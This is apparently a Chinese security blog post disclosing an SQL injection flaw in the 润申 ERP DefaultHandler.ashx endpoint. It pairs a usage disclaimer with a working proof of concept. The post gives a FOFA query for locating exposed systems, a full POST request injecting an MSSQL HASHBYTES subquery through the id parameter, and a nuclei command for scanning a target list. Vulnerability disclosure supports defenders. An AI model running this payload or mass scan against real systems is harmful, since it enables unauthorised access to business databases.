0x01 阅读须知
融云安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
0x02 好书推荐
-《白帽子讲Web安全(第二版)》简介:这是一本全面而深入的Web安全指南,专为渴望掌握现代Web安全技术与实战技巧的安全爱好者、开发人员及安全专家精心打造。本书不仅覆盖了Web安全的基础理论知识,还深入剖析了各类常见漏洞的成因、影响及防御策略,同时结合实战案例与先进工具,使读者能够迅速提升Web安全防护与渗透测试的能力。
0x03 漏洞描述
润申信息科技 ERP defaulthandler存在sql注入漏洞。
0x04 漏洞复现
fofa-query: body="PDCA/js/_publicCom.js"
1.执行poc进行SQL md5查询得到结果
POST /ashx/DefaultHandler.ashx HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36Connection: closeContent-Length: 115Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipaction=GetDetail&status=300&id=1+and+%01(select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','123')),3,32))<0--
2.nuclei验证脚本已发布于知识星球
nuclei.exe -t ruishen-erp-defaulthandler-sql.yaml -l subs.txt -stats推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...